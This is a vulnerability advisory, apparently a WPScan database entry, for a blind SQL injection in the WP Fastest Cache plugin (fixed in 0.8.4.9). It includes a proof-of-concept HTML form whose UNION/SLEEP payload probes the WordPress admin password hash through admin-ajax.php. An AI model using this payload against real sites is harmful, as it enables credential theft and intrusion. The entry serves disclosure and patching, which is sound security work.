WP Fastest Cache <= 0.8.4.8 - Blind SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
According to the researcher, for this vulnerability to be present WP-Polls plugin also needs to be installed.
Proof of Concept
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
	<input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
	<input type="submit" value="Send">
</form>

Affects

Plugin wp-fastest-cache
fixed in version 0.8.4.9

References

URL http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 248
Verified No
WPVDB ID 8229

Timeline

Publicly Published 2015-11-12 (about 1 year ago)
Added 2015-11-12 (about 1 year ago)
Last Updated 2015-11-12 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.